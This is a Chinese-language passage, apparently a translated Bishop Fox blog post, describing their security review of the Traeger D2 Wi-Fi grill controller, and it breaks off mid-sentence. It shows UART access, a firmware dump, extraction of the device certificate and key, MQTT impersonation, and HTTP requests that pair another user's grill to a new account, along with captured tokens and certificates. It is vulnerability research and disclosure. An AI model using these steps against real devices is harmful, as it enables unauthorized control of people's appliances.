产品安全审查方法:Traeger烤炉黑客技术分析
在本博客中,我们旨在通过回顾我们的产品安全审查方法,提供Bishop Fox员工如何发现Traeger烤炉D2 Wi-Fi控制器产品漏洞的额外背景信息。
收到设备后,Bishop Fox员工将印刷电路板(PCB)从外壳中取出,并检查了板上的组件。PCB包括一个ESP32设备和一个10针接口。
图1 - Traeger板上的10针接口
该设备的引脚排列在ESP32数据手册中有详细说明,如下所示:
图2 - ESP32 WROVER-E引脚排列
如上图所示,TXD0和RXD0引脚负责UART连接。在追踪板上的引脚后,这些UART引脚似乎与10针接口有物理连接。为了确认,Bishop Fox员工使用万用表检查ESP32设备上的发送和接收UART引脚与10针接口之间是否存在连续性,如下所示:
图3 - 10针接口与ESP32 UART引脚之间的电压连续性,显示100欧姆电阻
如上所示,万用表显示100欧姆电阻,表明发送和接收UART引脚与10针接口之间存在连续性。100欧姆的电阻可能是由于板背面的电阻器造成的,这些电阻器似乎位于UART引脚的路径上。
图4 - 板背面的电阻器解释了电阻原因
Bishop Fox员工通过将ESP32 UART发送引脚连接到Attify徽章的接收UART引脚,以及将ESP32 UART接收引脚连接到Attify徽章的发送UART引脚,建立了适当的硬件连接。
图5 - UART连接到UART调试桥接器
接下来,Bishop Fox员工使用picocom监控串行连接,并在设备启动后观察到以下输出:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
|
% sudo ~/Tools/picocom/picocom -b 115200 /dev/cu.usbserial-2
picocom v3.2a
…省略部分内容…
Terminal ready
ets Jul 29 2019 12:21:46
rst:0x1 (POWERON_RESET),boot:0x17 (SPI_FAST_FLASH_BOOT)
configsip: 0, SPIWP:0xee
clk_drv:0x00,q_drv:0x00,d_drv:0x00,cs0_drv:0x00,hd_drv:0x00,wp_drv:0x00
mode:DIO, clock div:2
load:0x3fff0018,len:4
load:0x3fff001c,len:5736
load:0x40078000,len:7916
load:0x40080000,len:5908
entry 0x40080314
I (29) boot: ESP-IDF v3.1.3-51-g39c6b2f90 2nd stage bootloader
I (29) boot: compile time 12:02:40
I (30) boot: Enabling RNG early entropy source...
I (35) boot: SPI Speed : 40MHz
I (39) boot: SPI Mode : DIO
I (43) boot: SPI Flash Size : 4MB
I (47) boot: Partition Table:
I (51) boot: ## Label Usage Type ST Offset Length
I (58) boot: 0 nvs WiFi data 01 02 00009000 00010000
I (66) boot: 1 otadata OTA data 01 00 00019000 00002000
I (73) boot: 2 factory factory app 00 00 00020000 00100000
I (80) boot: 3 ota_0 OTA app 00 10 00120000 00100000
I (88) boot: 4 ota_1 OTA app 00 11 00220000 00100000
I (95) boot: 5 storage Unknown data 01 82 00320000 000e0000
I (103) boot: End of partition table
I (107) esp_image: segment 0: paddr=0x00120020 vaddr=0x3f400020 size=0x2dee4 (188132) map
I (181) esp_image: segment 1: paddr=0x0014df0c vaddr=0x3ffb0000 size=0x02104 ( 8452) load
I (185) esp_image: segment 2: paddr=0x00150018 vaddr=0x400d0018 size=0xb4448 (738376) map
I (444) esp_image: segment 3: paddr=0x00204468 vaddr=0x3ffb2104 size=0x04714 ( 18196) load
I (451) esp_image: segment 4: paddr=0x00208b84 vaddr=0x40080000 size=0x00400 ( 1024) load
I (452) esp_image: segment 5: paddr=0x00208f8c vaddr=0x40080400 size=0x11714 ( 71444) load
I (499) boot: Loaded app from partition at offset 0x120000
I (499) boot: Disabling RNG early entropy source...
I (500) cpu_start: Pro cpu up.
I (503) cpu_start: Starting app cpu, entry point is 0x40081128
I (0) cpu_start: App cpu up.
I (514) heap_init: Initializing. RAM available for dynamic allocation:
I (521) heap_init: At 3FFAE6E0 len 00001920 (6 KiB): DRAM
I (527) heap_init: At 3FFD0C30 len 0000F3D0 (60 KiB): DRAM
I (533) heap_init: At 3FFE0440 len 00003BC0 (14 KiB): D/IRAM
I (539) heap_init: At 3FFE4350 len 0001BCB0 (111 KiB): D/IRAM
I (545) heap_init: At 40091B14 len 0000E4EC (57 KiB): IRAM
I (552) cpu_start: Pro cpu start user code
I (234) cpu_start: Starting scheduler on PRO CPU.
…省略部分内容…
|
如上所示,UART连接成功建立,设备启动日志显示在屏幕上。此外,通过将设备的GPIO引脚接地,可以强制设备进入下载状态,这最终使Bishop Fox员工能够恢复设备的固件。
成功建立与设备的UART连接后,Bishop Fox员工开始与设备交互,查看正在记录的信息。在配对过程中,设备托管了一个HTTP服务器,负责促进与移动应用程序的初始设备通信。为了演示这一点,Bishop Fox员工捕获了移动设备和烤炉的HTTP流量:
请求
1
2
3
4
5
6
|
POST /prod/pairing-sessions HTTP/2
Host: 1ywgyc65d1.execute-api.us-west-2.amazonaws.com
Authorization: COGNITO_TOKEN
…省略部分内容…
{"lat":37.421998,"long":-122.084,"thingName":"803428743EA7"}
|
响应
1
2
3
4
5
|
HTTP/2 200 OK
Content-Type: application/json
…省略部分内容…
{"pairingToken":"fde5f0f06d4aad2bd11d6ad66272fdeae2fa3c0ce8d9227a92ef8148fdddc8fc","thingName":"803428743EA7"}
|
如上所示,移动设备首先为烤炉检索了一个配对令牌,烤炉ID为803428743EA7。检索到此令牌后,移动应用程序提示用户加入烤炉的LAN以共享网络信息和配对令牌。
请求
1
2
3
4
|
GET /connect.html HTTP/1.1
Host: mytraegergrill.net
AWS-Pairing-Token: fde5f0f06d4aad2bd11d6ad66272fdeae2fa3c0ce8d9227a92ef8148fdddc8fc
…省略部分内容…
|
响应
1
2
3
4
5
|
HTTP/1.1 200 OK
Content-Type: text/json
{"networks": [{"ssid": "GrillMasterWiFi","sec_type": 3,"rssi": -46}
…省略部分内容…
|
上述请求似乎告知移动客户端烤炉可以通过其Wi-Fi接口检测和连接的网络。随后,移动应用程序发出了一个额外的POST请求,与烤炉共享配对令牌。
请求
1
2
3
4
5
|
POST /pairingtoken.html HTTP/1.1
AWS-Pairing-Token: fde5f0f06d4aad2bd11d6ad66272fdeae2fa3c0ce8d9227a92ef8148fdddc8fc
…省略部分内容…
__SL_P_UN1=fde5f0f06d4aad2bd11d6ad66272fdea&__SL_P_UN2=e2fa3c0ce8d9227a92ef8148fdddc8fc
|
响应
上述请求中的参数反映了配对令牌被分割成两个32字符的字符串。随后,移动应用程序共享了网络信息,允许烤炉连接到家庭网络:
请求
1
2
3
4
5
6
|
POST /nothing.html HTTP/1.1
Host: mytraegergrill.net
AWS-Pairing-Token: fde5f0f06d4aad2bd11d6ad66272fdeae2fa3c0ce8d9227a92ef8148fdddc8fc
…省略部分内容…
__SL_P_USE=2&__SL_P_USD= GrillMasterWiFi&__SL_P_USG=1&__SL_P_USF=[REDACTED Wi-Fi Password]&__SL_P_USC=Add
|
响应
收到网络信息后,烤炉连接到指定的Wi-Fi网络,并将自身注册到AWS IoT。值得注意的是,注册交互是TLS加密的,但Bishop Fox员工通过修补固件并降级到HTTP绕过了这一保护措施。注册可以在以下拦截的请求中看到:
请求
1
2
3
4
5
6
7
8
9
|
POST /certs HTTP/2
Host: durable-api.iot.traegergrills.io
Authorization: fde5f0f06d4aad2bd11d6ad66272fdeae2fa3c0ce8d9227a92ef8148fdddc8fc
…省略部分内容…
{
"thingName": "803428743EA7",
"csr": "-----BEGIN CERTIFICATE REQUEST-----\nMIICgTCCAWkCAQAwPDELMAkGA1UEBhMCVVMxEDAOBgNVBAoTB1RyYWVnZXIxGzAZ\nBgNVBAMTElRyYWVnZXIgSW9UIERldmljZTCCASIwDQYJKoZIhvcNAQEBBQADggEP\nADCCAQoCggEBAL4O20OYw2mDbk1kH/0cZ3h3ZxQhrYvZcPrQLBhsQOJ+c3D22ps9\ngAkf0j6XsOU7pIHX+xPDOpODaWX7OPq37RGjne8YbYy1p9PnMHYpnyajaCkXCjlW\nnWSJv51Cu36OBah4SAv+wd3v1l4oOXCFfiwAqobvqTxouKs1TkB47fRBSkI2OrLq\nR2qbYxZkCfi2lJiL3Gf/eB+1+uZumYYtjkKXe+WKGsbMw95aUr6BjX6i9Vv2x5lN\nKA8IEYDFZZ3vsxJUAbD0suh1Bmm6zRT9VmAbg65zWQMDaQi8T08hKVz1//rRqqo+\n3WffHdORnB6AyHTkiBizrTCmbJ1x2Dk06+UCAwEAAaAAMA0GCSqGSIb3DQEBCwUA\nA4IBAQADCxk3uJqgL9uquOGwXpaqCP34wASDulMitICb2FWy6IRQT9jfhpZufAjn\n43VU8QOPx3TGiAbQHmRWoN/D0y3+eGEytZ/UOvBAukclfQcsiGtz9wm77rT4oLsP\nXsu3cCfwKU90jUbAIKD/qjvVni7nF6EKpS70iwUn+0QVwGY5LlCyurdRKmH82ebP\nBctw3EviPOyv2XkjwEQTrfA26XNqv5RMewa951q7mZDLzP1KDWFXhR5aj+h7VKIS\nz5wzuh3/dXOjSvuSpMBqYKrKoG2bi2ItgoPS3uDT5i5BhldOTKiPo9w4UR3YyE1o\nCUIwgSarsz/b9ZtfO3CddRY1WFvx\n-----END CERTIFICATE REQUEST-----\n"
}
|
响应
1
2
3
4
5
|
HTTP/2 200 OK
Content-Type: application/json
…省略部分内容…
{"certificate":"-----BEGIN CERTIFICATE-----\nMIIDeDCCAmCgAwIBAgIVAL3s+ljpusLF05NHOtmnYD3f5D8pMA0GCSqGSIb3DQEB\nCwUAME0xSzBJBgNVBAsMQkFtYXpvbiBXZWIgU2VydmljZXMgTz1BbWF6b24uY29t\nIEluYy4gTD1TZWF0dGxlIFNUPVdhc2hpbmd0b24gQz1VUzAeFw0yMzEyMjUxNjMy\nMDRaFw00OTEyMzEyMzU5NTlaMDwxCzAJBgNVBAYTAlVTMRAwDgYDVQQKEwdUcmFl\nZ2VyMRswGQYDVQQDExJUcmFlZ2VyIElvVCBEZXZpY2UwggEiMA0GCSqGSIb3DQEB\nAQUAA4IBDwAwggEKAoIBAQC+DttDmMNpg25NZB/9HGd4d2cUIa2L2XD60CwYbEDi\nfnNw9tqbPYAJH9I+l7DlO6SB1/sTwzqTg2ll+zj6t+0Ro53vGG2MtafT5zB2KZ8m\no2gpFwo5Vp1kib+dQrt+jgWoeEgL/sHd79ZeKDlwhX4sAKqG76k8aLirNU5AeO30\nQUpCNjqy6kdqm2MWZAn4tpSYi9xn/3gftfrmbpmGLY5Cl3vlihrGzMPeWlK+gY1+\novVb9seZTSgPCBGAxWWd77MSVAGw9LLodQZpus0U/VZgG4Ouc1kDA2kIvE9PISlc\n9f/60aqqPt1n3x3TkZwegMh05IgYs60wpmydcdg5NOvlAgMBAAGjYDBeMB8GA1Ud\nIwQYMBaAFK5LcpMC+tMMCts/MFF8rCzyeGBbMB0GA1UdDgQWBBRlT2pg4UoHtTrF\nSckFkVZwPofFxjAMBgNVHRMBAf8EAjAAMA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG\n9w0BAQsFAAOCAQEAmad1qCwQYzhAR7VqEHhI4X5p6yVQ+cSS6AF1a/zpPKJppwPQ\nStDCF9ewjZlsE9o6qnClOQV9UgCaxJmX6ZHHjEitPnF+jIafDlYOxboXGxh2Z661\n4sGsK3VEStfjNtnN10GdETAG7ThWmVXxOYml+ybWDUy2l9iw/pq6uuAZEtjcUxlh\nSQl9jphjMjadRYAPtoegBnCGvdpDGmnz90b9aIu7U1wCcgV7QEKX+xHArCH+e9Mr\nItUCrKpFXybhzBPtbLp/4s2fa9KsX5s5WshIrq9Q/Ee/a0rWqO2HwV+erWg87uGc\n1Vr8lRPuSWKwxqYG/Z35IS5gzUkhy0q1qJVjDg==\n-----END CERTIFICATE-----\n"}
|
从/certs API检索到的上述证书随后被下载并由设备用于促进与服务器的安全mqtts通信。Bishop Fox员工在配对过程中捕获的UART调试日志进一步证明了这一点。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
|
(364403) OtaDownloadInterface: HTTP POST data:
{
"thingName": "803428743EA7",
"csr": "-----BEGIN CERTIFICATE REQUEST-----\nMIICgTCCAWkCAQAwPDELMAkGA1UEBhMCVVMxEDAOBgNVBAoTB1RyYWVnZXIxGzAZ\nBgNVBAMTElRyYWVnZXIgSW9UIERldmljZTCCASIwDQYJKoZIhvcNAQEBBQADggEP\nADCCAQoCggEBANAAmIO52U4v1K9DSUfbFL8jSMR/lUQzOch8cNtY9Dd99uyESIw1\ncyHHFgY5ZZWhdzxQWs3/OkDNURvZ/BLkQ++z0qQNTGDdeR+N7Rmb7d8xYkDEkMM6\nmEY9am/3BpfV0b9g7BMo+M410OrAqPCX/CZ01KqdHxCesBQNff81FYr3ccfouvZi\ngoUL8CaE4t98P7KvAOD2r8jXCGsZpMdbkFQbg5dB1fyWPr7qoJ+1l1xYNhRd80Ft\nsoy5Z2ZwAaDCqSsbLavDNnWYDV49PHVZ4PWckFrH6qVhJT+xGQEsutJB2Bf6HhgW\nRuweXAOFsQcb6M1HgW/JdfdvWF0O5KGSwPsCAwEAAaAAMA0GCSqGSIb3DQEBCwUA\nA4IBAQAAhSzZlfx54gzRSZHIg1rvRPN6/f6QSwoJVjRDSv85RTRXhR7znwPBX25e\nH547VKXH3wwu0vvboVFqFf+3AMyt9pIFJ5WMsj6BwgrOTVSqnmltWblvOJfWnK3V\nBGkWB+3OmgcHTx9kmg7NWGGtp0rldugy5h0Yr9cagvfDoV+3XvvFsfbtM1VT75Pg\n7xw6g2bhcBLtTSFUFRQ08PY6M4Sf93p7fyDO1M/Wff8SHy/heIr2Gbirp/+2WlDn\n4yLj4RHMiRqxEfcZSPOGmfIBIUqWxSUnKhGtGrVFgy8ybI7hwgtVuGRNcaNirB40\nrKMQ0/2eBV34A7u8kRiHG8Hbvgkr\n-----END CERTIFICATE REQUEST-----\n"
}
I (364507) OtaDownloadInterface: Connecting to https://durable-api.iot.traegergrills.io/certs
…省略部分内容…
(366949) OtaDownloadInterface: HTTP_EVENT_ON_CONNECTED
D (366953) OtaDownloadInterface: Writing POST data
…省略部分内容…
OtaDownloadInterface: HTTP_EVENT_ON_HEADER
D (368109) OtaDownloadInterface: HTTP_EVENT_ON_DATA, len=432
I (368341) FILE SYSTEM: File clientCert.pem exists: 0, File in use: 0
D (368541) OtaDownloadInterface: HTTP_EVENT_ON_DATA, len=512
D (368541) OtaDownloadInterface: HTTP_EVENT_ON_DATA, len=356
D (368542) OtaDownloadInterface: Writing value for certificate to file
…省略部分内容…
I (368658) FILE SYSTEM: File path = /spiffs/clientCert.pem
I (368664) FILE SYSTEM: Writing file
I (368720) FILE SYSTEM: Opened file for write (binary mode): /spiffs/clientCert.pem
D (368827) OtaDownloadInterface: HTTP_EVENT_DISCONNECTED
D (368830) OtaDownloadInterface: HTTP_EVENT_DISCONNECTED
I (368830) OtaDownloadInterface: Download completed cleanly: true.
I (368836) FILE SYSTEM: Closed file: clientCert.pem
I (368939) MqttConnectAndRun: Attempt #1 Cert download succeeded
|
如上所示,设备在配对过程中生成了证书签名请求(CSR),并将其写入/certs API。随后,API响应了一个证书,该证书被下载并写入/spiffs/clientCert.pem。然后,mqtt客户端使用此证书打开与API的加密通道。
在高层次上,mqtt协议遵循发布者/订阅者模型。订阅者(烤炉)订阅发布者(API)发布消息的主题。因此,在设备启动时,烤炉通过mqtts(MQTT安全)连接到API,并消费可能包括烤炉命令的消息。
为了演示这一点,Bishop Fox员工通过从固件中提取生成的证书,并使用自己的mqtt客户端连接到API来模仿烤炉的mqtt客户端。由于固件位于ESP32设备上,因此在建立适当的硬件连接后,使用esptool.py来提取固件。此工具还用于确认闪存的大小,如下所示:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
sudo esptool.py --port /dev/cu.usbserial-2 flash_id
esptool.py v4.7.0
Serial port /dev/cu.usbserial-2
Connecting.....
Detecting chip type... Unsupported detection protocol, switching and trying again...
Connecting...
Detecting chip type... ESP32
Chip is ESP32-D0WD-V3 (revision v3.0)
Features: WiFi, BT, Dual Core, 240MHz, VRef calibration in efuse, Coding Scheme None
Crystal is 40MHz
MAC: 34:94:54:4a:97:54
Uploading stub...
Running stub...
Stub running...
Manufacturer: 20
Device: 4016
Detected flash size: 4MB
Hard resetting via RTS pin...
|
确定闪存大小后,Bishop Fox员工使用esptool.py提取了大小为4MB的固件。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
% sudo esptool.py --port /dev/cu.usbserial-2 read_flash 0 0x400000 flash_contents.bin
esptool.py v4.7.0
Serial port /dev/cu.usbserial-2
Connecting...
Detecting chip type... Unsupported detection protocol, switching and trying again...
Connecting...
Detecting chip type... ESP32
Chip is ESP32-D0WD-V3 (revision v3.0)
Features: WiFi, BT, Dual Core, 240MHz, VRef calibration in efuse, Coding Scheme None
Crystal is 40MHz
MAC: 34:94:54:4a:97:54
Stub is already running. No upload is necessary.
4194304 (100 %)
4194304 (100 %)
Read 4194304 bytes at 0x00000000 in 387.7 seconds (86.6 kbit/s)...
Hard resetting via RTS pin...
|
根据ESP32文档,ESP32固件分为几个分区,以便将多个应用程序刷入设备。幸运的是,存在用于提取ESP32分区以及分区表的工具。通过使用esp32_image_parser.py,Bishop Fox员工检索了分区表,如下所示:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
% python3 ~/Tools/esp32_image_parser/esp32_image_parser.py show_partitions flash_contents.bin
reading partition table...
entry 0:
label : nvs
offset : 0x9000
length : 65536
type : 1 [DATA]
sub type : 2 [WIFI]
…省略部分内容…
entry 4:
label : ota_1
offset : 0x220000
length : 1048576
type : 0 [APP]
sub type : 17 [ota_1]
entry 5:
label : storage
offset : 0x320000
length : 917504
type : 1 [DATA]
sub type : 130 [unknown]
|
证书位于从内存地址0x320000开始的存储分区中。
1
2
|
% python3 ~/Tools/esp32_image_parser/esp32_image_parser.py dump_partition ./flash_contents.bin -p storage
Dumping partition 'storage' to storage_out.bin
|
提取存储分区后,Bishop Fox员工使用mkspiffs检索了证书。
1
2
3
4
5
6
|
% ~/Tools/mkspiffs/mkspiffs ./storage_out.bin -u ./dest
Directory ./dest does not exists. Try to create it.
/currentConfig.txt > ./dest/currentConfig.txtsize: 1398 Bytes
/clientCert.key > ./dest/clientCert.keysize: 1679 Bytes
/clientCert.pub > ./dest/clientCert.pubsize: 451 Bytes
/clientCert.pem > ./dest/clientCert.pemsize: 1261 Bytes
|
如上所示,客户端证书已成功从固件中检索。
接下来,Bishop Fox员工使用mqttx(一个mqtt客户端)来模仿烤炉并连接到API端点。客户端配置为利用提取的证书启动安全的mqtts连接。
图6 - 配置的mqttx客户端
此外,Bishop Fox员工在客户端中订阅了prod/803428743EA7/run_cmd主题,烤炉使用该主题接收命令。为了验证此连接,Bishop Fox员工启动了移动应用程序并拦截了一个命令。
请求
1
2
3
4
5
6
7
8
|
POST /prod/things/803428743EA7/commands HTTP/2
Host: 1ywgyc65d1.execute-api.us-west-2.amazonaws.com
Authorization: [COGNITO_TOKEN]
…省略部分内容…
{
"command" : "112,60"
}
|
响应
1
2
3
4
|
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
…省略部分内容…
{}
|
接下来,Bishop Fox员工观察到命令已成功被mqttx客户端接收:
图7 - 模仿烤炉的客户端成功接收命令
通过这个有效连接,Bishop Fox员工现在可以测试授权问题,并验证烤炉是否可以从未经授权的用户接收命令。为了测试这一点,Bishop Fox员工通过移动应用程序注册了一个全新的Traeger账户。接下来,使用新账户,Bishop Fox员工尝试将烤炉注册到不应该有权访问的账户下:
请求
1
2
3
4
5
6
|
POST /prod/pairing-sessions HTTP/2
Host: 1ywgyc65d1.execute-api.us-west-2.amazonaws.com
Authorization: [NEW_COGNITO_TOKEN]
…省略部分内容…
{"thingName":"803428743EA7"}
|
响应
1
2
3
4
5
|
HTTP/2 200 OK
Content-Type: application/json
…省略部分内容…
{"pairingToken":"33e6099c4d36a84e7081954624110d1921d281f3d6d8766410ef4a21604644e9","thingName":"803428743EA7"}
|
如上所示,Bishop Fox员工为烤炉检索了一个新的pairingToken,指定了相同的烤炉ID。接下来,Bishop Fox员工向/certs API发送了一个后续请求,以完成烤炉配对过程,使用自签名的证书签名请求来表明不需要设备生成的证书。
请求
1
2
3
4
5
6
7
8
9
|
POST /certs HTTP/2
Host: durable-api.iot.traegergrills.io
Authorization: 33e6099c4d36a84e7081954624110d1921d281f3d6d8766410ef4a21604644e9
…省略部分内容…
{
"thingName": "803428743EA7",
"csr": "-----BEGIN CERTIFICATE REQUEST-----\nMIICqDCCAZACAQAwYzELMAkGA1UEBhMCVVMxCzAJBgNVBAgMAkhXMQowCAYDVQQHDAFhMSEwHwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQxCjAIBgNVBAsMAWQxDDAKBgNVBAMMA2JvYjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAPueyA6os9H7V7T65nd8rm5mTrbpSSFYFheRYN3aaZ8gvROWUJnz3b6EKKzSwBWaQCJEAY1fMsicAMuOpq+u6YMFq1utda4uLaVRzGfbJBIKMOAAYaoC/lp8iwA0Z3HRUWx/kVO2shBal7mm7kgq+i9vGf/k2qG2Phx/aqvcaJpsKskTt9pz5GdYpBKav8FEg2YW601JXEY4+MIylDbU3Y0DAdSftYzaYk7Ol64eqGz/1DRaww5VNAaRz5TdIYaKbalphLr7rPwaui76pmbgNLXzMXnhwQeh4nwn0ObdwWX+OOBRTmKM8vg6r+AqRR4tkZFX7qGU3rXsC3S29lA48I8CAwEAAaAAMA0GCSqGSIb3DQEBCwUAA4IBAQA+J4qAwpvur1AM2XPKSE7aOM1+E5Rbn7uSpjuROc5Q7O764kGNsptJaUgX8PrS4OW3O1n9sQOHbLF6Qya4ay2MUPApvekw5OwmaNY1YnTquhPlGy11Dad5smuyrEMN7Zl5GGH2F0/q3pa2Jt7cnLWj2gfFIMC8d3HxFNTPbf/ZhJnE1eElwtNS0DFkrTbgDRo3Smu+BjLljMFRVonbfZefBxrIEx8ghgVzyKMJe0w7C9e6Mt4so2OJTuh2MGZmRa1IaeSm0tND5JS/YdLcXm58O7b9M61uKMgOyerxbiTp/LyaHlUmoVIElcGGz2R/WHi5pLuHKsxscbqX//mo2lnS\n-----END CERTIFICATE REQUEST-----\n"
}
|
响应
1
2
3
4
5
|
HTTP/2 200 OK
Content-Type: application/json
…省略部分内容…
{"certificate":"-----BEGIN CERTIFICATE-----\nMIIDnjCCAoagAwIBAgIULItWQDaaBwZJXb9djdZQZIU4b7owDQYJKoZIhvcNAQEL\nBQAwTTFLMEkGA1UECwxCQW1hem9uIFdlYiBTZXJ2aWNlcyBPPUFtYXpvbi5jb20g\nSW5jLiBMPVNlYXR0bGUgU1Q9V2FzaGluZ3RvbiBDPVVTMB4XDTIzMTIyODE1NDQ1\nNloXDTQ5MTIzMTIzNTk1OVowYzELMAkGA1UEBhMCVVMxCzAJBgNVBAgMAkhXMQow\nCAYDVQQHDAFhMSEwHwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQxCjAI\nBgNVBAsMAWQxDDAKBgNVBAMMA2JvYjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC\nAQoCggEBAPueyA6os9H7V7T65nd8rm5mTrbpSSFYFheRYN3aaZ8gvROWUJnz3b6E\nKKzSwBWaQCJEAY1fMsicAMuOpq+u6YMFq1utda4uLaVRzGfbJBIKMOAAYaoC/lp8\niwA0Z3HRUWx/kVO2shBal7mm7kgq+i9vGf/k2qG2Phx/aqvcaJpsKskTt9pz5GdY\npBKav8FEg2YW601JXEY4+MIylDbU3Y0DAdSftYzaYk7Ol64eqGz/1DRaww5VNAaR\nz5TdIYaKbalphLr7rPwaui76pmbgNLXzMXnhwQeh4nwn0ObdwWX+OOBRTmKM8vg6\nr+AqRR4tkZFX7qGU3rXsC3S29lA48I8CAwEAAaNgMF4wHwYDVR0jBBgwFoAUy24K\n2Wfaa9J+S7BMJ/Wv+esVvlEwHQYDVR0OBBYEFIwGcb+YrXxEOZcPPiFmkclhSGLT\nMAwGA1UdEwEB/wQCMAAwDgYDVR0PAQH/BAQDAgeAMA0GCSqGSIb3DQEBCwUAA4IB\nAQB1GEi1fKXwUgBI0VDZ0RFVSQCtFH1MeMPE+htPOuoxBvztefiywDozQR4V2no8\nEmxDp5a4W/9Y0Xs+PAXU1AtgpfQWpwR0sxcdOSPW8x6jNv9f5Laj+mcbiQapw1ab\n5BjizgV4eKCTrUYC37oFN/kAmwZDDw+0s4a1VfO2vvy43/YtYsPUk840moPywoz+\n9aIJwgXFqmmt3YNwV5hRg0c7VXbfW2zy50BuqZlU9jDyu5d88u3xU3M1YHTbTGDp\nhg4ByM52/Ve9zs/Ge0nGQuXM8gE1lNZvYsDxVvCQlJSRgGU+EypSGt7UjSOvIwu6\nrnMvo4g8qaJVN4okrnQdqLzW\n-----END CERTIFICATE-----\n"}
|
如上所示,API接受了请求。此外,这并不影响mqtts连接的当前证书配置,因为设备仍然可以连接。调用/certs后